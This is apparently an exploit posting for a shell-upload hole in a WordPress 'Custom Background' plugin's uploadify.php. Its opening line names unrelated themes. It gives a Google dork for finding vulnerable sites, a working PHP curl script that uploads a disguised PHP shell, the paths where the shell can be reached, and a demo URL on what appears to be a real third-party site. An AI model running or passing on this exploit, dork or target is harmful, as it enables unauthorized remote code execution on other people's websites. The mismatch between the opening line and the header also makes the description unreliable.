The Vithy, Appius, Dagda, Vector, and Shotzz WordPress themes suffer from a shell upload vulnerability in uploadify.php.
c85029288baa3e23dc157c377164f3a876fdf6b5996606933e83c2bba6eb1bdb
######################################################################################
# Exploit Title : WordPress Custom Background Shell Upload
# Google Dork : inurl:"/wp-content/plugins/custom-background/"
# Date : 23-03-2014
# Exploit Author : CaFc Versace
# Tested on : Windows 7
# Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-------------------------------------------------------------------------------------
Exploit:
-------------------------------------------------------------------------------------
Shell Access : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg
or find ur shell at : http://localhost/wp-content/uploads/[years]/[month]/
---------------------------------------------------------------------------------------
Demo : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php
---------------------------------------------------------------------------------------
Credits: Agency CaFc
Thanks : SurabayaBlackhat
./learn to be better